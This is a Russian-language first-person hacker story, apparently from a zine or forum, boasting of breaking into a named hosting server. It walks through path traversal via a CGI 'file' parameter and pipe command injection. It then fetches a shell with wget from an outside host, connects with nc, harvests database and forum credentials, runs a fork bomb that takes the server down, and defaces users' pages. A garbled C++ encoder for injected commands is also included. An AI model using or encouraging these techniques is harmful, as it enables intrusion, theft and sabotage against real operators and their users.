Первый влом как и первый раз запоминается раз и навсегда.
Само собой, что мы наделали несколько ошибок, но обязуемся их более не повторять, так как написали пару интересных с нашей точки зрения утилит, но о них чуть позже.
Все началось в скучный осенний вечер. Проведя “стандартный” поиск по гуглу filetype:cgi site:ru увидели большое количество ссылок с кучей бажных скиптов (куда программеры и
админы хостингов смотрят?). Вводя вместо имени файла ../../../../../etc/passwd получили дохрена логинов с многих сайтов (теперь понимаю почему спам процветает). Где то на двадцатой странице поиска попали на ссылку типа
www.rbsm.ru/cgi-bin/getFile.cgi?file=blablabla.doc. Подмена имени файла на ../../../../../etc/passwd дало большой список логинов, из него было понятно, что этот сервант какого-то хостера. Выполнив
ls получили список файлов! Радости не было предела. Первым делом решено было заливать шел, но где его взять? Перерыв
журналы и нашли исходник на перле. Так как
своего сайта у нас не было и не было времени заводить новый, мы залили
скрипт на FTP своего института и с него залили шел на сервак
wget http://www.somehost.ua/rand, предварительно изменив порт на 31247. Самым интересным
было то, что мы даже не представляли что это за сайт и
что это за хостер. Это впоследствии мы удивились, что на этом серваке beta3.artstyle.ru нет файрвола! Соединились с серваком через nc www.rbsm.ru 31247. ls -l показал, что все файлы имеют права доступа rw-r—r-- и принадлежат юзеру rbsm. Выполнив id узнали, что мы работаем от того же имени! Сначала хотели дефейснуть, но не хотелось палиться, решили узнать что, как и почему. Полазив по папкам и конфигам пришли к выводу, что админ(ы) параноик(и), дурак(и) и к тому же тормоз(а). Ядро системы 2.6.1, но на таком древнем дистрибутиве, что его мой дедушка юзал :-)). Его название (не дедушки) мы не получили
- /etc/issue был изменен, но примерно это Mandrake. Службы
FTP и др. не проверяли на бажность, лишь просканили и поняли, что это рабочий сервант с кучей служб
(ssh, ftp, MySql, finger).
Порывшись в скриптах нашли пароль на MySql. В мыле лежал всякий мусор, а также логины и пароли сидящих на форуме и их мыла. Таких тупых логинов и паролей не выдумает даже идиот (login Uebu pass 123 и таких там много....). Богатые дети обделены немного серым веществом. Просмотрели доступные директории, нашли бажный suidperl 5.0.0.3, но рута не поимели
- нам хватало нашего шела, хотя теперь жалеем об этом, т.к. хостятся там не последние организации. В процессе лазания по папкам вытянули кучу конфигов и файл с хешами паролей, но неизвестно куда они подошли бы т.к логины были левые. Начали изучать инфраструктуру сети (как она выглядит смотрите во
вложенном файле). От нечего делать решили немного поприкалываться и повесить сервант:
#!/usr/bin/perl
while(1){
fork();}
В результате сервант отказался отвечать на наши запросы и длилось это примерно 45 минут в течении которых хостеры радовались отсутствию своих страничек, а админ не успел допить своё кофе. На этом мы думали что спалились... Ан нет
:))) умный админ пропатчил ядро, но старые баги любезно оставил нам на радость.
Для большей безопасности выполнения программ через http написали прогу, которая превращала наши команды в безобразную последовательность
вида www.rbsm.ru/cgi-bin/getFile.cgi?file=%7C%20%6C%73%20%2D%6C%20%7C:
#include
#include
int main(){
using namespace std;
string s_cmd;
const char* c_cmd;
do{
getline(cin,s_cmd);
if (s_cmd == "exit")
{ exit(0); }
for (int i=0;i
c_cmd=s_cmd.c_str();
printf("%%%X",c_cmd[i]);
}
puts("\n");
}
while (1);
cout<
Для обнаружения открытых портов был скопирован socklist (из дистрибутива ASP Linux 9.2). После этого мы узнали, что наш
провайдер решил воспользоваться нашим шелом и открыл ещё парочку на других портах. Это надо было пресекать, решено было поставить пароль на шел, и мы вынуждены были незначительно переписать ваш прекрасный шел для возможности аутентификации. И заодно сообщить об этом провайдеру письмом следующего содержания
Мы верные служители клавиатуры и мышки, всемогущей матушки КОНСОЛИ и отца вождя APACHE v2.0.3 (с поддержкой PHP) вынуждены писать кляузу, ибо возмущены вашим поведением. Зачем же вы АДМИНЫ ВСЕМОГУЩИЕ не обделяете вниманием свои логи и наше присутствие в них. А так же пользуетесь багами, которые были созданы не вами и так бессовестно вами использовались. Мы как честные жрецы консоли обязаны отгородить вас от мучения удалённого администрирования сервера с занятным адресом 195.14.38.103 на портах
47381, 47485 с машины d1.im.net.ua ай ай ай негодяи как вам не стыдно, но мы постарались и исправили досадную ошибку коряворукого программера и любезно закрыли эту БАГУ. А так же пользуясь случаем удалили свой скрипт
(И ВАШ!!!!!!). Так что теперь можете не волноваться и спать спокойно.
Мы, Ночной дозор кибер пространства, БДИМ!!!!!!!! И в случае чего готовы принять на себя ваш ударный труд.
Если вы хотите с нами сотрудничать и получить кое какую информацию просьба писать НАМ. Ведь люди должны помогать друг другу в беде. Но если вы захотите ВОЙНЫ, то поставьте хороший Файрвол на сервак, ибо у нас есть большой молот который рушит (пусть и не сразу
;)) такие преграды как бажный proFTPd. Ведь нас гораздо больше чем один. Мы не хотим войны, ибо мы служители клана "Белая консоль", который призывает к спокойствию и миру во всём кибер пространстве.
RESPECT from -=CHC=- bl@ck&Thomas
Ждём с нетерпением Ответа от клана "всемогущего провидера"
И больше наглых негодяев мы не наблюдали на сервере, т.к. закрыли дыры в скрипте за что подлый админ не сказал даже спасибо
:(. Зато наш шел висел без проблем и радовал всех кто знал пароль :), т.е. нас.
Прошло два дня и мы подумали о дефейсе, но index.htm не нашли, зато остальные папки и файлы можно было рвать. Решили, что самым прикольным
будет задефейсить домашние странички детишек
(мерзавцы:)). Сильно не увлекались, так, что сайт можно поднять за пару секунд
(мы просто изменили индекс). Самым интересным оказалось то, что утром дефейса не было, зато все скрипты были поменяны, а надёжный шел висел как ни в чём не бывало. Это была самая большая неожиданность, поджидавшая нас.
Сейчас мы шела не наблюдаем, может файрвол, может проснулся ещё один админ.
RESPECT from -=CHC=- bl@ck&Thomas
Show must Go On !!!
Интересное файло,
использовавшееся в процессе: files.tar